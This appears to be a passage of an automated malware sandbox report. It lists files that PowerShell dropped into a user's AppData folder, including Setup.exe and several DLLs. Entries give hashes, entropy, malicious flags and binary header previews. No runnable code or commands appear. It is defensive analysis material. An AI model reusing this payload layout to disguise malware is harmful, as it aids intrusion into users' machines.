                                                                                                                                                          SHA1:26F7CBEFC55DA0459903B1FB964D5382C7FA988C
                                                                                                                                                          SHA-256:085E482A89918E76A91AA3E17DB7AC5046B346D2477791CBF846A5367906791B
                                                                                                                                                          SHA-512:AED6A522816EB97C8E92AEF85F419CED6FA67E69B2DD212BB62F1024E8261EE3E442BD6F7868C1B9A550BB604793733D469437B0653020E2DC23EF05A8A00EA6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK........2.rY................x86/PK.........;.V....%%...G..-...x86/api-ms-win-core-processthreads-l1-1-1.dll.z.TSK..I..7.......RTz.J.... R.Ih**...* ..JU..4.*R...AAT........IhA......}...<Y;93{.>{....=3.v=.............^z.._..q....J........qDd...E@.!=...x....$..#q.H#[{....Ubgg......Z..M..`;l......M.MM.-{Q..p.....m.h....8`./.b.n..G..9....a...~..=|..B+....e'........v.f.g.v......YH...2...j.!y....R"`.$4..!..b..L......H...lC...*...............6.A..Gq"..i ...x\.P?.7..f].J...w!........"v..0....5..C$.......2D.!Z.....!...G.T Y/..A....$..".DI.=.h..b.../.4..!.a...fh...lPO..8E?.b.._..O.*B..%.I..,.CT.E)B.%../`..D.6.'..A.$.......|.........lS,.0.@...6.*..l........-.8..4...y......>V8?....._.L..Z...._.!>....2..Zk.....F./.#l....b..1.......-4Z.Y.0.`....ix~#..q..a....7'.42..IA..F.........`..x....`..B...c........".`godo.TsFH....r0...h...3.........;hb.|.U..)x.....k......[..X&..(U;..ct.u*..?.r........\..M.~.g.....q...Uc.........oc...3.l...l.}.@...6...lt`......_.9=....I.+8..=@...

                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6222
                                                                                                                                                          Entropy (8bit):3.713960268020827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:0FNmQRoCGWU23WUukvhkvklCywStl1VTl1XSogZo2RF1VTl+XSogZo2l1:iloCGP8CkvhkvCCtSD1VTCHLH1VTHHLj
                                                                                                                                                          MD5:A9F8CB1E8F89C82CB455006A2935D502
                                                                                                                                                          SHA1:9F52AC269BF06478C32C8BEE1A1CCF2B1099DBD2
                                                                                                                                                          SHA-256:802EBF7E24094786790C1D83D7F41456308ECD464709EF1D85BF87510A0811B6
                                                                                                                                                          SHA-512:B7CC5B59E473906D003A0B4DF0AF8D1B77AFC6D98391DE909174D81ED9F83AF04F2D2C418817F188FEBDC4D0DAD8EDE31FCFBF87B01126E61CEC1327EE3F4C31
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...................................FL..................F.".. ......Yd........:..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.....`..:..Z....:......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BsY............................d...A.p.p.D.a.t.a...B.V.1.....sY....Roaming.@......EW)BsY............................Xg..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BsY.............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BsY.............................,..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BsY......................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BsY......................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BsY.......0..........

                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O6R0O33Y5BWDCVIYAWWT.temp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6222
                                                                                                                                                          Entropy (8bit):3.713960268020827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:0FNmQRoCGWU23WUukvhkvklCywStl1VTl1XSogZo2RF1VTl+XSogZo2l1:iloCGP8CkvhkvCCtSD1VTCHLH1VTHHLj
                                                                                                                                                          MD5:A9F8CB1E8F89C82CB455006A2935D502
                                                                                                                                                          SHA1:9F52AC269BF06478C32C8BEE1A1CCF2B1099DBD2
                                                                                                                                                          SHA-256:802EBF7E24094786790C1D83D7F41456308ECD464709EF1D85BF87510A0811B6
                                                                                                                                                          SHA-512:B7CC5B59E473906D003A0B4DF0AF8D1B77AFC6D98391DE909174D81ED9F83AF04F2D2C418817F188FEBDC4D0DAD8EDE31FCFBF87B01126E61CEC1327EE3F4C31
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...................................FL..................F.".. ......Yd........:..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.....`..:..Z....:......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BsY............................d...A.p.p.D.a.t.a...B.V.1.....sY....Roaming.@......EW)BsY............................Xg..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BsY.............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BsY.............................,..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BsY......................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BsY......................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BsY.......0..........

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Core.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6270976
                                                                                                                                                          Entropy (8bit):6.672220413310173
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:UE5jJSnL0VxTOnyJJsv6tWKFdu9Cs/CzYnxqfDgw:UE5NSn0xrJJsv6tWKFdu9CMkexqfDF
                                                                                                                                                          MD5:65CA5D5EFCB36677F934B96F40FED552
                                                                                                                                                          SHA1:34A433C41B11D809E3B3B59C2F4030D1E3D94782
                                                                                                                                                          SHA-256:0AED0AE4B0631EB3EA9AD348B4E2F6276312192B8391A44209113668911596E0
                                                                                                                                                          SHA-512:F28707F05D23B866E7E71173E82A7F0C799F4C3CAADEF4F8B9B9D9EC78466F98F93755D987F4DE6C75551C7DCB47703CDC2CC718DE156FBD52107D78C7888C49
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........*.7.Kfd.Kfd.Kfd.3.d.Kfd.#ge.Kfdx.d.Kfd.#ce.Kfd.#be.Kfd.#ee.Kfd.#be.Kfd.#`e.Kfd.#ge.Kfd.Kgd.Jfdx"be.Kfdx"ce.Kfdx"fe.Kfdx".d.Kfd.K.d.Kfdx"de.KfdRich.Kfd........PE..d...}).a.........." .....r/...0.....P+.......................................``...........`...........................................P..N....X...... `.......Y..-...........0`.Z&....K.T...................p.K.(...p.K.............../.0............................text....p/......r/................. ..`.rdata...(.../...(..v/.............@..@.data........0X..V....X.............@....pdata...-....Y......fX.............@..@.qtmimed.....0[.......Z.............@..P.rsrc........ `......._.............@..@.reloc..\&...0`..(...._.............@..B........................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Network.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1389568
                                                                                                                                                          Entropy (8bit):6.4031070456368
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:HO51NG2bq1mhQpCR4SSUVxiKZiva+su3pUlSuMEFR+PoT0lqU:34hQoRpSUVYKZqvsu3pUlNMEePoT0E
                                                                                                                                                          MD5:C24C89879410889DF656E3A961C59BCC
                                                                                                                                                          SHA1:25A9E4E545E86B0A5FE14EE0147746667892FABD
                                                                                                                                                          SHA-256:739BEDCFC8EB860927EB2057474BE5B39518AAAA6703F9F85307A432FA1F236E
                                                                                                                                                          SHA-512:0542C431049E4FD40619579062D206396BEF2F6DADADBF9294619C918B9E6C96634DCD404B78C6045974295126EC35DD842C6EC8F42279D9598B57A751CD0034
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Z..q.n.".n.".n."...".n."E.{#.n."L.{#.n."L.|#.n."L.z#.n."L.~#.n."E.~#.n."..~#.n.".n~".j."..z#.n."...#.n."...".n.".n.".n."..}#.n."Rich.n."........................PE..d....).a.........." .....p...........h....................................................`..............................................n...L..@....p.......p..x.......................T...................@...(...@...................H ...........................text....n.......p.................. ..`.rdata..X............t..............@..@.data...8Q.......$..................@....pdata..x....p.......&..............@..@.rsrc........p......................@..@.reloc............... ..............@..B................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5644904
                                                                                                                                                          Entropy (8bit):6.473386186229144
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:o/zx+riUDpJowboU+XEsumY2XW6jBYeZ1ER:2x+riUDwUj12X1tY5
                                                                                                                                                          MD5:AD2735F096925010A53450CB4178C89E
                                                                                                                                                          SHA1:C6D65163C6315A642664F4EAEC0FAE9528549BFE
                                                                                                                                                          SHA-256:4E775B5FAFB4E6D89A4694F8694D2B8B540534BD4A52FF42F70095F1C929160E
                                                                                                                                                          SHA-512:1868B22A7C5CBA89545B06F010C09C5418B3D86039099D681EEE9567C47208FDBA3B89C6251CF03C964C58C805280D45BA9C3533125F6BD3E0BC067477E03AB9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...................................p...........!..L.!This program cannot be run in DOS mode....$.......82..|S..|S..|S..u+}.dS..i,..xS..i,..vS..i,..zS..i,..JS..i,..zS...5..~S...5..zS...5..}S..&..~S...:..{S...:..xS......uS......dR...:..FS...:..LS......}S......tS...5..TS..|S..4V..J....S..J...}S..|Sy.}S..J...}S..Rich|S..........................PE..d....\.e.........."....%.47...........$........@..............................W......VV...`.................................................P.O......`V.h.....S.d.....U.h(...pV.....G.T.....................G.(.....G.@............P7.. ...........................text....27......47................. ..`.rdata.......P7......87.............@..@.data........pP..H...TP.............@....pdata..d.....S.......R.............@..@.rsrc...h....`V......jU.............@..@.reloc......pV......pU.............@..B................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\config.prx

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):373656
                                                                                                                                                          Entropy (8bit):5.747099794440249
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:rbT9vTZFNSlIbVf7o3Cyi7igb/Js0S6uZZspiDbZHNjWOnNxFiKey1ISQlXflY:fRvNvvbhOq7F3S/qpiDlNCONvmXdY
                                                                                                                                                          MD5:14934CACA84D5FE0288F27EFB31DCBF8
                                                                                                                                                          SHA1:98C8C659488A5782679112E0FFB089422A664AC5
                                                                                                                                                          SHA-256:7FA86147035627BAE39576BCBE619D045E94A48C4DB8CA131968C20BB4DE4A36
                                                                                                                                                          SHA-512:9A239132A46FE578FA04FF727D8C28F9E1D179E7154619670A22A403819F337AF0A96EBD7081D04D53910A12BBDC548B3CD2B2A285931C92F1C149AD5D846A6A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................".....".......Q....R....D....C....T.......r...M....S....V....Rich............................PE..L.....b`.....................t....................@..................................X....@.................................${..|...................`...S...P...)...................................=..@...............P............................text...$........................... ..`.rdata.............................@..@.data...............................@....rsrc..............................@..@.reloc..nD...P...F..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\gcrv

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):23966
                                                                                                                                                          Entropy (8bit):5.51352959157031
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:vp7uhvldPVDiktgppK0deSS88H69o67ZkZxDJoeHDsqfKtXZqhSbpKafCQN3dMsd:x69ldN+ugppK0d1S7HB6lSxDSe0tXZq+
                                                                                                                                                          MD5:D3DBC9E34960169C38554935FEE7E2A5
                                                                                                                                                          SHA1:B0EE82E4293ED4237A0D9ECD90EB91B99694F6B6
                                                                                                                                                          SHA-256:86C72C5EE6DE1DFCC3ED7E52A39DD2692B00C4EBF966B30A94F12C18BEDE0377
                                                                                                                                                          SHA-512:7509D56A0A4F33CE39724C38AB926C113C01D6BCF314F3F4E62513AC43AC1274A34B62AB6063B0F0C0DB8AFD2D1BA6578F6F873BAC4A9E9D0644A890B0EC49EC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:N...gR..Cpy.d_]bhLuwn._.Lgbop].g\Q....ZH.^q.t.o.a.j.[...N....k.R.vPj..`..R_...xjs..y..r.w..v.h..lVR....t.G.p]q....o...mMs....k..cv..Sxw.U..E.....LZcZH..M...n.f.....Dm....H..k[.M...y..UA\w.u.Gg....]..\.l.....TI.OL].]IdOC...Jx^....Ju..[.R.O.F..].EB.....J.in.....c.s..]..B.n..gw.f..l.P..s...dN.se.dBB.`w.X...w^_..`UJATrLe.v.p.]hk.Eq...V.J.t..Jh..Ve[.wBe..EJ._.dm..Ev.V..Z..M..Db.O`vDs.bg..FZEEpZ..Q.S...B.N..a.J....hA...Zlrrr..LbR.wt.aC.[......k..D.B...Nc.wva..K.a_vdMD.qikE..u.jDa.q..h......F..g.\j...H..JPZ.G..U....h.qT....uHE.....Bq.brI...^d.M..YE.V.....PW..xJZ.D.EJG.WE..g.g...Gk.l.x.dIg`.....ln.y....bMhGg.OgsE....tu.\.`..k.K.r.Fx`..RFC\W..l.AG.FJ.h......o_._..N..PUH\.\..xunW.UG..X`M..gi`...DU...cp..ZAvp.YA.D.....M.a.sPZ..XWSA..iG.k.A.GAk...l].wZ.......t...M....w.fbg....]e.Z.Uq..MmX....c..sh.w....l_.uq..u....J.ToQpO..rDaRyg.D.a.....B....UW...v.oyH.G.L..[.lQ......Br..I..QD..Bc....Aj_.eE.X^jC.iwQ.....A.HX..c]...T.R\.P...hSDBS...Rb...M.M......_....S\`.k....N...SV.HY.d....wr..x`Cm.qp.Tk..I^Hx..[

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\libcrypto-1_1-x64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2849280
                                                                                                                                                          Entropy (8bit):5.898395689897465
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:KlOh5PuX2I9Rkf5gnQ7duzGuqFCtLQ2IqNPz38JQ41CPwDv3uFfJ:Q2Irkn2Iqt38C41CPwDv3uFfJ
                                                                                                                                                          MD5:28DEA3E780552EB5C53B3B9B1F556628
                                                                                                                                                          SHA1:55DCCD5B30CE0363E8EBDFEB1CCA38D1289748B8
                                                                                                                                                          SHA-256:52415829D85C06DF8724A3D3D00C98F12BEABF5D6F3CBAD919EC8000841A86E8
                                                                                                                                                          SHA-512:19DFE5F71901E43EA34D257F693AE1A36433DBDBCD7C9440D9B0F9EEA24DE65C4A8FE332F7B88144E1A719A6BA791C2048B4DD3E5B1ED0FDD4C813603AD35112
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OKkQ.%8Q.%8Q.%8XV.8C.%8.F$9S.%8.F 9Z.%8.F!9Y.%8.F&9R.%8EE$9Z.%8Q.$8..%8.G&9P.%8.G!9.,%8.G%9P.%8.G.8P.%8.G'9P.%8RichQ.%8................PE..d...._.c.........." .................q.......................................0,...........`.........................................`.&..h...j+.@.....+.|.....).t.............+.pN...=$.8............................=$..............`+..............................text...g........................... ..`.rdata..{....0......................@..@.data...aw... )..*....(.............@....pdata........)......&).............@..@.idata..."...`+..$....*.............@..@.00cfg........+.......*.............@..@.rsrc...|.....+.......+.............@..@.reloc...q....+..r....+.............@..B........................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\libssl-1_1-x64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):685056
                                                                                                                                                          Entropy (8bit):5.49393422013168
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:PcPPRr7K55yAAKDNkk1+cFc+CmRkS9/+wDe1rlXiE4D9u3AG3UQjA5WU2lvz:2N43+cFcmYhXixo7708U2lvz
                                                                                                                                                          MD5:4AD03043A32E9A1EF64115FC1ACE5787
                                                                                                                                                          SHA1:352E0E3A628C8626CFF7EED348221E889F6A25C4
                                                                                                                                                          SHA-256:A0E43CBC4A2D8D39F225ABD91980001B7B2B5001E8B2B8292537AE39B17B85D1
                                                                                                                                                          SHA-512:EDFAE3660A5F19A9DEDA0375EFBA7261D211A74F1D8B6BF1A8440FED4619C4B747ACA8301D221FD91230E7AF1DAB73123707CC6EDA90E53EB8B6B80872689BA6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5,5.qM[TqM[TqM[Tx5.T}M[T#%ZUsM[Te&ZUsM[T#%^UzM[T#%_UyM[T#%XUrM[T.$ZUrM[TqMZT.L[T.$_U]M[T.$[UpM[T.$.TpM[T.$YUpM[TRichqM[T........PE..d....`.c.........." .....0...J.......%....................................................`..............................................N..(5..........s.......DL..............\.......8............................................ ..(............................text............0.................. ..`.rdata...&...@...(...4..............@..@.data...!M...p...D...\..............@....pdata...U.......V..................@..@.idata...V... ...X..................@..@.00cfg...............N..............@..@.rsrc...s............P..............@..@.reloc..@............X..............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):578384
                                                                                                                                                          Entropy (8bit):6.524580849411757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:RBSNvy11qsslnxU/1ceqHiNHlOp/2M+UHHZpDLO+r2VhQEKZm+jWodEEVAdm:RBSDOFQEKZm+jWodEE2dm
                                                                                                                                                          MD5:1BA6D1CF0508775096F9E121A24E5863
                                                                                                                                                          SHA1:DF552810D779476610DA3C8B956CC921ED6C91AE
                                                                                                                                                          SHA-256:74892D9B4028C05DEBAF0B9B5D9DC6D22F7956FA7D7EEE00C681318C26792823
                                                                                                                                                          SHA-512:9887D9F5838AA1555EA87968E014EDFE2F7747F138F1B551D1F609BC1D5D8214A5FDAB0D76FCAC98864C1DA5EB81405CA373B2A30CB12203C011D89EA6D069AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f..f..f.....d..o.A.p..f........c.....n.....b...........g....-.g.....g..Richf..........................PE..d................." ...$.F...V......`1....................................................`A........................................PB..h.......,................9......PO......8...p...p...........................0...@............`...............................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data....8...@......................@....pdata...9.......:...<..............@..@.rsrc................v..............@..@.reloc..8............z..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35704
                                                                                                                                                          Entropy (8bit):6.591016227549893
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:z1vZLMtUYqOoKFYpWcm5gW/ki0pSt+eB+Hj+R9zUkUTRtHRN7SoHR9zui5TJ:zpCtzqOjKYWi0QKHji9zSRtnx9zJTJ
                                                                                                                                                          MD5:69D96E09A54FBC5CF92A0E084AB33856
                                                                                                                                                          SHA1:B4629D51B5C4D8D78CCB3370B40A850F735B8949
                                                                                                                                                          SHA-256:A3A1199DE32BBBC8318EC33E2E1CE556247D012851E4B367FE853A51E74CE4EE
                                                                                                                                                          SHA-512:2087827137C473CDBEC87789361ED34FAD88C9FE80EF86B54E72AEA891D91AF50B17B7A603F9AE2060B3089CE9966FAD6D7FBE22DEE980C07ED491A75503F2CF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x. c<.N0<.N0<.N0..O1>.N05..08.N0..J1;.N0..M1>.N0<.O0..N0..O19.N0..K1(.N0..N1=.N0..0=.N0..L1=.N0Rich<.N0........PE..d...E.b..........." ...$.....&.......................................................<....`A.........................................?..L...<A..x....p.......`.......<..xO...........4..p...........................`3..@............0..8............................text............................... ..`.rdata..2....0......................@..@.data........P......................@....pdata.......`.......2..............@..@.rsrc........p.......6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\opengl64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18578896
                                                                                                                                                          Entropy (8bit):6.451339218330448
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:393216:PXhbUNnoBP98OQ//aXUszfTBHCOUZ2UenCDkOH2:PXhNB4nlW
                                                                                                                                                          MD5:0A84667145E7EFEF026C888D4B768126
                                                                                                                                                          SHA1:27673E1BD7C55BBA6EAA37620D3B3820CE45D46A
                                                                                                                                                          SHA-256:DD575F3C64382193610815909BD2C52490244ECBBB9BBA6EEF5FE4F0BB43BB4D
                                                                                                                                                          SHA-512:3E964C996ED358787C4DFDB965A00B38B4118C804AE1BF8D32AEB7D936584E72C188E3FA0D27D1C2FFD3BE13DCA8045B08B28B15070812C195D82D1BF23A2604
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hX2.,9\.,9\.,9\.%A.49\.wQY.-9\.....+9\..TX.&9\..T_.'9\..T].*9\.wQX.)9\.wQZ.(9\..TY..9\.CO.-9\..k..(9\.wQ]..9\..PY.e9\.C]Z.-9\.@QX.*9\.C]]."9\..gX.\9\..PX..;\.CO../9\.,9].T:\..gY.t8\..PY.'9\..PY.)9\.,9\.49\..WY.k9\..W\.-9\..W..-9\.,9.-9\..W^.-9\.Rich,9\.................PE..d...K..d.........."...........r......S.........@..........................................`.................................................<...p....P,.xh....#.,....D...9....,.$... '..T...................x'..(...0...................@...L...@....................text............................... ..`.uedbg..0........................... ..`.rdata....=.......=.................@..@.data.....)..@......................@....pdata..,.....#.....................@..@_RDATA...#... ,..$..................@..@.rsrc...xh...P,..j...&..............@..@.reloc..$.....,.....................@..B................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\sbiupg

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):806258
                                                                                                                                                          Entropy (8bit):7.867340280444731
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:fAgXTn9UMGNIdYP3lxAvcQrqUr85Bk9/VGzxhQ:ffLFyxdBKgznQ
                                                                                                                                                          MD5:38BE7366796E12E9DDAD7B3F244B401B
                                                                                                                                                          SHA1:59C6000B886D831E88BFA80DAC222B03FBF3F193
                                                                                                                                                          SHA-256:CBAD28D0A414B7C247CBF2891BF5FC3CA7939DDC74A4AE0E4C623AD3604C8A8D
                                                                                                                                                          SHA-512:810056EB3FC5F2021561A0B79543E893595E89444B8EC62F9AA1C67393548733645E7DA93F102D2CF203ABC1622CEA9C879DB5D06CFF71A497C3339001B99F9E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.J.S...j...F.].....ttp..\.CQ..rjoQVM......Q.M.NHYL...tI.CoL.mh.V..B.U.f.xT.i.y^..TRmS.tf...Ym.DrSB.......\R....AO.G.UxjlPJ[hQeA.\..KLmph..v[...[..Lnr..._`N.U.Dt.MP.hC.]O]W..CZ...x.JD....i....dVj...._..hkmi.q...ijl\..R_S......j......ZS...s.yL...h..gr.e..pC.n....Hcq.]X..f..L.l.vnR.r.[.........u.._.q.g.M..b....^B\...K..a..`so........Ch...jiRm.^Y.UYOa.N......cjpZ..YS.O.TpV...lQ...E....YD..tVjvdw..[Y..]....aH....L[........tx....K...p.....Ga.h]i.NyNuAiu....Bi`ki.H......frp.TvYT..fV..uJQ.gRu.xN.[w..V.........b..y....ada.\.LX...B....lyU.`....U..kKC....R..AU..`......bl..q\.XLh\W]ON`.O..Y.iO.pm.\..VH.m..a.IEMn.`k..Gk.[t.kh.CV.Dp.VZ.S..vo...Lf...B.qI..f.t..AW_.k...mn......[D.U...OC....Oxq....v..CeaV.yNX.u...wHj..o...i.D.B.v.H.PQfBe.T...F..`...B...F.T.`Z...XfX......q.h....N.v.^..Ur.x...Fu....t..sYQ.Ou....OwMe.F..s..C.f.ib.c..O.Z..R`.S[.CQeMhd...W.Sp.r...S..md.Me.A.f...n\oj...bq..V...mS.b.wP.^rQ..b.H.Sc^a.JX..TF..mO.vh.E^smpA..Z.c.........X..ud..X..MG.Z...e.j.CIR.i.....J..x.nQ..J..HaJ.hT.gM..f...fn

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\steam_api64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):298384
                                                                                                                                                          Entropy (8bit):6.4905956879024
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:504VEQ2u/niy9UVLCe9ZqdrP+VXvv+sJYB2RHKBi65lhTbCc+hnvvEyP7yq+uei1:QZu/i874ZcrMv2cRh7yqO2CPLHxYq8/B
                                                                                                                                                          MD5:6B4AB6E60364C55F18A56A39021B74A6
                                                                                                                                                          SHA1:39CAC2889D8CA497EE0D8434FC9F6966F18FA336
                                                                                                                                                          SHA-256:1DB3FD414039D3E5815A5721925DD2E0A3A9F2549603C6CAB7C49B84966A1AF3
